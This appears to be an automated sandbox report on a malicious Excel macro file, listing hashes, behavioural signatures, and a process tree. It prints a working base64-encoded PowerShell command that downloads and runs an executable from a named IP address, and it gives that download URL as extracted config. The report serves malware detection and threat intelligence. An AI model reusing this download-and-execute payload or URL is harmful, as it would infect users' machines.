Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 22:32
Static task
static1
Behavioral task
behavioral1
Sample
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource
win10v2004-20241007-en
General
-
Target
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
-
Size
14KB
-
MD5
70820ac2bb527bb0a10747a06d2c2b0b
-
SHA1
7289b7ddcdcaa9450c27e1579f36d67a544cee80
-
SHA256
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753
-
SHA512
64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5
-
SSDEEP
384:A0z+vPw85+pkQ1z7fMc+8Pty4jZwENYBp7zMLmh:p+3ZgkKzDMCXjZwENmdKk
Malware Config
Extracted
http://84.252.122.205/xcx/system.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2108 1840 cmd.exe 30 -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2100 powershell.exe -
Deletes itself 1 IoCs
pid Process 1840 EXCEL.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\53F67F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1840 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2100 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1840 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2100 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1840 EXCEL.EXE 1840 EXCEL.EXE 1840 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1840 wrote to memory of 2108 1840 EXCEL.EXE 31 PID 1840 wrote to memory of 2108 1840 EXCEL.EXE 31 PID 1840 wrote to memory of 2108 1840 EXCEL.EXE 31 PID 1840 wrote to memory of 2108 1840 EXCEL.EXE 31 PID 2108 wrote to memory of 2100 2108 cmd.exe 33 PID 2108 wrote to memory of 2100 2108 cmd.exe 33 PID 2108 wrote to memory of 2100 2108 cmd.exe 33 PID 2108 wrote to memory of 2100 2108 cmd.exe 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm1⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\cmd.execmd /c Cxrgbutjpc.bat2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBCAGUAeABzAGMAbwB5AGEAcABhAHIAYwB5AGgAbgBmAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwA4ADQALgAyADUAMgAuADEAMgAyAC4AMgAwADUALwB4AGMAeAAvAHMAeQBzAHQAZQBtAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Filesize21KB
MD53a37982a36a3e286c391ec4c915a14f8
SHA1b200610c40d68db675d1d22ba3ccbcd25e8597b9
SHA256cdc2c1721db1db71374fa8cbaae0aa916feb77dc53d8a30b15acbefd7b5e6419
SHA512f303c35aa44e1ace057eb48dd94184ebe6b56adf8f2be9b8a5c98a9ebd5c1a1c51d1e42844223df2c717d0042ee8c6f38af5a1bcba6bc38e6cf35a23a4ccc23d
-
Filesize
587B
MD531814477e987cc1e94638caa7f39f293
SHA1c3814edcc331117303ced19f53006a4ecd09a833
SHA256de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4
SHA51209a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268